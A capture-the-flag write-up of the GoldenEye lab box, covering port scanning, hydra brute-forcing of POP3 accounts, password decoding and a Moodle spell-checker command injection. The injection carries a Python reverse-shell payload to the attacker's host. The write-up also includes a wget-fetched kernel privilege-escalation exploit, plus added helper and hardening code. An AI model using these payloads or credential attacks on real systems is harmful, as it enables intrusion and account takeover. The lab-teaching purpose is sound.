##########
Nmap Scan:
##########

Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-03 19:12 EST
Nmap scan report for 10.0.2.14
Host is up (0.00089s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
MAC Address: 08:00:27:3B:86:3C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.75 seconds

[~!~] The two high ports show up as "unknown" because this was a plain port scan. A follow-up with version detection (nmap -sV -p 55006,55007 10.0.2.14) would have fingerprinted them instead of leaving us to guess at the service later on.

##########
Dirbuster:
##########

root@kali:~# dirbuster
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: / - 200
File found: /terminal.js - 200
File found: /index.html - 200
Dir found: /icons/ - 403
Dir found: /icons/small/ - 403

'terminal.js' found on the web server:

var data = [
  {
    GoldenEyeText: "
Severnaya Auxiliary Control Station
****TOP SECRET ACCESS****
Accessing Server Identity
Server Name:....................
GOLDENEYE

User: UNKNOWN
Naviagate to /sev-home/ to login"
  }
];
//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
////InvincibleHack3r
//
//BTW Natalya says she can break your codes
//
var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
  var currentElementId = allElements[j].id;
  var currentElementIdContent = data[0][currentElementId];
  var element = document.getElementById(currentElementId);
  var devTypeText = currentElementIdContent;
  var i = 0, isTag, text;
  (function type() {
    text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + ` `;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    if (isTag) return type();
    setTimeout(type, 60);
  })();
}

[~!~] This is a lot of valuable information to work with, so we should begin deciphering the file. For an even fuller investigation, we will check the index.html source as well.

'index.html' found on the web server:
GoldenEye Primary Admin Server

[~!~] First of all, we notice a comment to Boris telling him to change his default password.

[~!~] Second, the "encoded" password in that comment is written in the raw file as HTML numeric character entities (&#NN; sequences, one per character), so it is not readable at a glance but any HTML entity decoder turns it straight back into plain text. It decodes to: InvincibleHack3r

############################
Using our found Credentials:
############################

[~!~] I traveled to 10.0.2.14:80 and found this home page: (image: index.png)

[~!~] I went to 10.0.2.14:80/sev-home/ and was greeted with a prompt for a username and password.

Username: boris
Password: InvincibleHack3r

[~!~] aaaaaaaaaaaaand SUCCESS! We got into /sev-home/.
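The two "encoded" secrets in this box (the HTML-entity password in terminal.js above, and the base64 string that turns up later in the EXIF data of for-007.jpg) are both single-step encodings, and a small tool that tries the usual ones and reports whichever yields printable text saves squinting at them. The following is an added example written for this writeup, not code from the original post. Both sample inputs are constructed: the entity-encoded string is built here from the plaintext the page shows (it is exactly what the raw comment looks like), and the base64 value is the Image Description tag from later in the writeup.

```python
"""Try common single-step encodings against a captured string and report
every decoding that yields printable text.

Added example for this writeup, not code from the original post. The two
sample inputs at the bottom are constructed (see the lead-in).
"""
import base64
import binascii
import html
import re
import string

PRINTABLE = set(string.printable) - set("\x0b\x0c")


def _is_printable(s: str) -> bool:
    return bool(s) and all(ch in PRINTABLE for ch in s)


def decode_html_entities(s: str):
    """&#NN; / &#xNN; / named entities. Only counts if something actually changed."""
    out = html.unescape(s)
    return out if out != s else None


def decode_base64(s: str):
    """Strict base64: alphabet and padding must be right so ordinary words are rejected."""
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) or len(s) % 4:
        return None
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def decode_hex(s: str):
    """Even-length hex string to UTF-8 text."""
    if not re.fullmatch(r"(?:[0-9A-Fa-f]{2})+", s):
        return None
    try:
        return bytes.fromhex(s).decode("utf-8")
    except UnicodeDecodeError:
        return None


DECODERS = {
    "html-entities": decode_html_entities,
    "base64": decode_base64,
    "hex": decode_hex,
}


def candidates(s: str) -> dict:
    """Return {decoder_name: plaintext} for every decoder that produced printable text."""
    found = {}
    for name, fn in DECODERS.items():
        out = fn(s.strip())
        if out is not None and _is_printable(out):
            found[name] = out
    return found


# Constructed sample inputs: the numeric-entity form of the terminal.js
# password, and the EXIF Image Description value from for-007.jpg.
ENTITY_ENCODED_PASSWORD = "".join(f"&#{ord(c)};" for c in "InvincibleHack3r")
EXIF_IMAGE_DESCRIPTION = "eFdpbnRlcjE5OTV4IQ=="

if __name__ == "__main__":
    for sample in (ENTITY_ENCODED_PASSWORD, EXIF_IMAGE_DESCRIPTION):
        print(sample, "->", candidates(sample))
```

The strict base64 check matters more than it looks: without the alphabet and length test, plain words like "boris" would base64-decode to garbage and clutter the output.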
This greeted us with a webpage playing some movie scene that I didn't recognize and this block of text: (image: sevhome.png)

[~!~] *Clearly* we hold Top Secret clearance xD

I believe the next step must have something to do with the POP3 server they have running; this is probably on 55006 or 55007.

##########################
Accessing the POP3 Service
##########################

[~!~] I used telnet to find which of the two high, non-default ports was hosting the POP3 service:

root@kali:~/Documents/GoldenEye# telnet 10.0.2.14 55007
Trying 10.0.2.14...
Connected to 10.0.2.14.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System

[~!~] So we need an account that will get us into their POP3 service. I went with 'boris' since we already know that is a valid web user, and fed hydra the fasttrack wordlist:

root@kali:~/Documents/GoldenEye# hydra -l boris -P ~/Dictionaries/Login/fasttrack.txt -t20 10.0.2.14 -s55007 -I pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-03 19:29:11
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 20 tasks per 1 server, overall 20 tasks, 222 login tries (l:1/p:222), ~12 tries per task
[DATA] attacking pop3://10.0.2.14:55007/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 122 to do in 00:02h, 20 active
[55007][pop3] host: 10.0.2.14   login: boris   password: secret1!
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-03 19:31:10

[~!~] Creds for boris were successfully found! Note that the POP3 password (secret1!) is not the web password (InvincibleHack3r), so the two services don't share credentials. Let's see what we can find on their email service, perhaps something about the GNO (GoldenEye Operators) training?

root@kali:~/Documents/GoldenEye# telnet 10.0.2.14 55007
Trying 10.0.2.14...
Connected to 10.0.2.14.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.
LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path:
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for ; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path:
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for ; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path:
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id 4B9F4454B1
        for ; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,
Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....
PS - Keep security tight or we will be compromised.
.

[~!~] Ok...that is a lot of information that we stumbled upon. The third mail also tells us where the prize is: a hidden file in the root directory of this server holding the final access codes. One attack surface we now have is the set of usernames of other users on their POP3 system (natalya, alec, xenia, janus).
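Reading mailboxes by hand over telnet is fine for three messages, but the rest of this box is the same loop repeated (log in, RETR everything, pick the credentials, hostnames and paths out of the bodies). The following is an added example written for this writeup, not code from the original post: dump_mailbox() does the USER/PASS/LIST/RETR exchange with the standard library's poplib against the non-standard port, and extract_leads() pulls the leads out of a body. The function names are mine; the sample bodies at the bottom are constructed copies of mails shown elsewhere on this page so the parser can be exercised offline.

```python
"""Dump a POP3 mailbox and grep the bodies for credentials, hostnames and paths.

Added example for this writeup, not from the original post. dump_mailbox()
talks to a live server (poplib, plain POP3 on whatever port is given);
extract_leads() is pure parsing and is exercised on constructed sample
bodies copied from the mails this page shows.
"""
import email
import poplib
import re
import sys
from email import policy


def dump_mailbox(host: str, port: int, user: str, password: str) -> list:
    """Log in with USER/PASS and RETR every message. Returns raw RFC 822 strings."""
    conn = poplib.POP3(host, port, timeout=10)
    try:
        conn.user(user)
        conn.pass_(password)
        count, _size = conn.stat()
        raw = []
        for n in range(1, count + 1):
            _resp, lines, _octets = conn.retr(n)  # lines come back without CRLF
            raw.append(b"\n".join(lines).decode("utf-8", "replace"))
        return raw
    finally:
        conn.quit()


def body_of(raw_message: str) -> str:
    """Text body of a raw message (first text/plain part if multipart)."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    part = msg.get_body(preferencelist=("plain",))
    return part.get_content() if part is not None else ""


LEAD_PATTERNS = {
    "username": re.compile(r"\busername:\s*(\S+)", re.I),
    "password": re.compile(r"\bpassword:\s*(\S+)", re.I),
    # dotted name ending in an alphabetic TLD, so version numbers don't match
    "hostname": re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I),
    # absolute path; the lookbehind keeps the path part of a URL from matching twice
    "path": re.compile(r"(?<![\w.:])((?:/[\w-]+(?:\.[\w-]+)*)+/?)"),
}


def extract_leads(body: str) -> dict:
    """Return {kind: sorted unique matches} for every pattern that hit."""
    leads = {}
    for kind, pat in LEAD_PATTERNS.items():
        hits = sorted(set(pat.findall(body)))
        if hits:
            leads[kind] = hits
    return leads


# Constructed sample bodies, copied from mails shown on this page.
SAMPLE_BODIES = {
    "natalya/2": (
        "Ok Natalyn I have a new student for you. Ok, user creds are:\n"
        "username: xenia\n"
        "password: RCP90rulez!\n"
        "And if you didn't have the URL on outr internal Domain: "
        "severnaya-station.com/gnocertdir\n"
        "Since you're a Linux user just point this servers IP to "
        "severnaya-station.com in /etc/hosts.\n"
    ),
    "doak/1": (
        "James,\nGo to our training site and login to my account....dig until "
        "you can exfiltrate further information......\n"
        "username: dr_doak\n"
        "password: 4England!\n"
    ),
}

if __name__ == "__main__":
    # usage: python pop3_leads.py 10.0.2.14 55007 boris 'secret1!'
    host, port, user, pw = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4]
    for i, raw in enumerate(dump_mailbox(host, port, user, pw), 1):
        print(f"--- message {i} ---")
        print(extract_leads(body_of(raw)))
```

The same script run once per cracked account is the whole "credential chain" of this box; everything hydra later finds (natalya, doak) just feeds back into the host/user arguments.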
NOTE: they don't scan their emails for security risks, yikes.

[~!~] Let's try and break into some other users' accounts:

root@kali:~/Documents/GoldenEye# cat users.txt
natalya
alec
xenia
janus
admin
root

root@kali:~/Documents/GoldenEye# hydra -L users.txt -P ~/Dictionaries/Login/fasttrack.txt -t20 10.0.2.14 -s55007 -I pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-03 19:44:51
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 20 tasks per 1 server, overall 20 tasks, 1332 login tries (l:6/p:222), ~67 tries per task
[DATA] attacking pop3://10.0.2.14:55007/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 1232 to do in 00:13h, 20 active
[55007][pop3] host: 10.0.2.14   login: natalya   password: bird

[~!~] More creds found! Shortly after hydra found natalya it crashed. So I figured I would just look at what I could find on her account.

root@kali:~/Documents/GoldenEye# telnet 10.0.2.14 55007
Trying 10.0.2.14...
Connected to 10.0.2.14.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path:
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for ; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path:
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for ; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:
username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
.

[~!~] A ton more information to go off of. The training site is only reachable by the name severnaya-station.com, which nothing resolves for us, so we need a hosts entry pointing that name at the box before the site will work (a virtual host on port 80 serves a different site depending on the Host header).

############################
Round one site investigation
############################

[~!~] I updated the hosts file as directed by the email:

root@kali:~/Documents/GoldenEye# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.0.2.6        vtcsec
10.0.2.14       www.severnaya-station.com severnaya-station.com

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

[~!~] Then I visited the site: (image: gnotrainingsite.png)

[~!~] Also recall we got some creds in the same email:

User: xenia
Pass: RCP90rulez!

[~!~] I logged into xenia's account on the GNO training site and scoured it until I found a nice juicy message:

Tuesday, 24 April 2018 09:24 PM:
Greetings Xenia,
As a new Contractor to our GoldenEye training I welcome you.
Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here. My email username is...
doak
Thank you,
Cheers,
Dr. Doak "The Doctor"
Training Scientist - Sr Level
Training Operating Supervisor
GoldenEye Operations Center
Sector Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@
Please Recycle before you print, Stay Green aka save the company money!
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.

[~!~] OH BOY, another mail account we can try and break into...

root@kali:~/Documents/GoldenEye# hydra -l doak -P ~/Dictionaries/Login/fasttrack.txt -t20 10.0.2.14 -s55007 -I pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-03 20:22:29
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 20 tasks per 1 server, overall 20 tasks, 222 login tries (l:1/p:222), ~12 tries per task
[DATA] attacking pop3://10.0.2.14:55007/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 122 to do in 00:02h, 20 active
[55007][pop3] host: 10.0.2.14   login: doak   password: goat
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-03 20:24:14

[~!~] These passwords ARE SO WEAK :O Let's see what Dr. Doak's email has in store for us.

root@kali:~/Documents/GoldenEye# telnet 10.0.2.14 55007
Trying 10.0.2.14...
Connected to 10.0.2.14.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.
LIST
+OK 1 messages:
1 606
.
RETR 1
+OK 606 octets
Return-Path:
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for ; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!
.

[~!~] Woot woot, more creds in this never-ending journey of creds. Note that doak's mail password (goat) and his training-site password (4England!) are different again, so each service has to be attacked on its own. Now we'll see what's on his account...

#########################
Deciphering a secret file
#########################

(image: secretfile.png)

[~!~] Welp, that looks important! Let's read this very top secret message. I downloaded it to my local machine to read it.

root@kali:~/Documents/GoldenEye# cat s3cret.txt
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

[~!~] OOOooooOOOOooo a message to agent 007 himself! The note says the app's admin creds were captured in clear text but can't be written in the file because text on these servers gets scanned, which is a strong hint that they are stashed in something that is not text: the image at /dir007key/for-007.jpg.

root@kali:~/Documents/GoldenEye# wget http://severnaya-station.com/dir007key/for-007.jpg
--2018-12-03 20:35:06--  http://severnaya-station.com/dir007key/for-007.jpg
Resolving severnaya-station.com (severnaya-station.com)... 10.0.2.14
Connecting to severnaya-station.com (severnaya-station.com)|10.0.2.14|:80... connected.
HTTP request sent, awaiting response...
200 OK
Length: 14896 (15K) [image/jpeg]
Saving to: ‘for-007.jpg’

for-007.jpg         100%[====================================================================================>]  14.55K  --.-KB/s    in 0s

2018-12-03 20:35:06 (223 MB/s) - ‘for-007.jpg’ saved [14896/14896]

[~!~] Here is the image: (image: for-007.jpg)

[~!~] It looks like a picture from the old GoldenEye game. We'll use exiftool to look for anything hidden in the image's metadata, since that is the obvious place to tuck a string into a "non-text" file:

root@kali:~/Documents/GoldenEye# exiftool for-007.jpg
ExifTool Version Number         : 11.16
File Name                       : for-007.jpg
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2018:04:24 20:40:02-04:00
File Access Date/Time           : 2018:12:03 20:35:06-05:00
File Inode Change Date/Time     : 2018:12:03 20:35:06-05:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : eFdpbnRlcjE5OTV4IQ==
Make                            : GoldenEye
Resolution Unit                 : inches
Software                        : linux
Artist                          : For James
Y Cb Cr Positioning             : Centered
Exif Version                    : 0231
Components Configuration        : Y, Cb, Cr, -
User Comment                    : For 007
Flashpix Version                : 0100
Image Width                     : 313
Image Height                    : 212
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 313x212
Megapixels                      : 0.066

[~!~] The Image Description tag holds what looks like base64 (the trailing == padding gives it away): eFdpbnRlcjE5OTV4IQ==
Decoding that yields: xWinter1995x!

[~!~] Referring back to s3cret.txt, this is most likely the app's admin password. We will attempt to get into the admin account on the training site with it.

###########
The Exploit
###########

[~!~] This took me FOREVER to get to work, and it was for a rather frustrating reason. The training site is Moodle. After researching Moodle exploits, I discovered a vulnerability in the spell-checker path setting: the "path to aspell" value is an admin-editable string that the server hands to a shell when the spell checker runs, so site admins (which we are at this point) can replace it with an arbitrary command.
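The bug class here is worth seeing in miniature before the payload: a configuration value is interpolated into a command string, so whatever the admin types becomes the program the shell runs. The following is an added Python sketch written for this writeup, not the Moodle plugin's own code (which is PHP); it contrasts the vulnerable construction with a hardened one that validates the path as a bare absolute filename and passes an argv list so no shell ever parses it. The payload string is the one used below in the writeup; vulnerable_command(), safe_argv() and program_the_shell_would_run() are names I chose.

```python
"""Admin-supplied 'path to aspell' pasted into a shell command, vulnerable vs hardened.

Added illustration for this writeup, not Moodle's code. Nothing here executes
the payload: the vulnerable variant only returns the command string it would
have run, and the hardened variant refuses it before anything is spawned.
"""
import os
import re
import shlex
import subprocess

# The reverse-shell payload from the writeup (10.0.2.4:443 is the attacker's listener).
PAYLOAD = r"""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.4",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""


def vulnerable_command(aspell_path: str, lang: str = "en") -> str:
    """The vulnerable pattern: the setting is interpolated into one string that is
    later given to a shell (shell_exec / popen / subprocess.run(shell=True)).
    A 'path' that is really a program plus arguments runs exactly as typed."""
    return f"{aspell_path} -a --lang={lang} --encoding=utf-8"


def program_the_shell_would_run(cmd: str) -> str:
    """First word after POSIX shell tokenisation, i.e. the binary that actually executes."""
    return shlex.split(cmd)[0]


_SAFE_PATH = re.compile(r"^/[A-Za-z0-9_./-]+$")   # absolute, no whitespace or metacharacters


def safe_argv(aspell_path: str, lang: str = "en", must_exist: bool = True) -> list:
    """Hardened form: reject anything that is not a plain absolute filename, optionally
    require it to be an executable file, and return argv as a list so the value is
    only ever an exec() argument, never shell input."""
    if not _SAFE_PATH.match(aspell_path) or ".." in aspell_path:
        raise ValueError(f"rejecting aspell path: {aspell_path!r}")
    if must_exist and not (os.path.isfile(aspell_path) and os.access(aspell_path, os.X_OK)):
        raise ValueError(f"not an executable file: {aspell_path!r}")
    if not re.fullmatch(r"[A-Za-z_-]+", lang):
        raise ValueError(f"rejecting lang: {lang!r}")
    return [aspell_path, "-a", f"--lang={lang}", "--encoding=utf-8"]


def run_spellcheck(aspell_path: str, text: str) -> str:
    """Run the validated argv without a shell and return aspell's stdout."""
    argv = safe_argv(aspell_path)
    return subprocess.run(argv, input=text, capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    cmd = vulnerable_command(PAYLOAD)
    print("vulnerable pattern would execute:", program_the_shell_would_run(cmd))
    try:
        safe_argv(PAYLOAD, must_exist=False)
    except ValueError as exc:
        print("hardened pattern:", exc)
```

Two caveats a reviewer would add: the validator only stops shell injection, so an admin who can point the setting at any executable on disk (an interpreter, say) still gets code execution, and the real fix for that is an allowlist of known aspell locations rather than a free-text setting; and none of this helps while the engine is set to one that never invokes the local binary, which is exactly the detail that cost the author 30 minutes below.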
[~!~] By injecting this payload into the spellchecker path:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.4",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

[~!~] and then creating a blog post and invoking the spell-checker on it, we can successfully throw ourselves a reverse shell (10.0.2.4 is my Kali box, listening on 443). Neat!

root@kali:~/Documents/GoldenEye# nc -lnvp 443
listening on [any] 443 ...
connect to [10.0.2.4] from (UNKNOWN) [10.0.2.14] 52741
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

[~!~] The reason I was stuck on this for so long was that the spell engine was set to Google Spell, which sends the text off to Google's service and never touches the local aspell path, so the injected command simply never ran. I FINALLY found this setting after about 30 minutes, set it to PSpell (which does invoke the configured path), and BOOM, like magic it immediately worked!

###################
Rooting the Machine
###################

[~!~] The final step to any box is getting root. Due to time constraints to finish this box, I had to get a little help (credit: https://medium.com/egghunter/). He pointed me towards an Ubuntu 14.04 local privilege escalation in overlayfs.
The exploit: https://www.exploit-db.com/exploits/37292

[~!~] I hosted the edited code on my server so that I could easily transfer it to the GoldenEye box with wget.
NOTE: this method (pulling a public kernel exploit onto the target over HTTP from a box you control) is extremely noisy and would NEVER be advisable during actual pen-testing.

] 5,041       --.-K/s   in 0.04s
2018-12-03 21:16:08 (126 KB/s) - 'overlayfs.c' saved [5041/5041]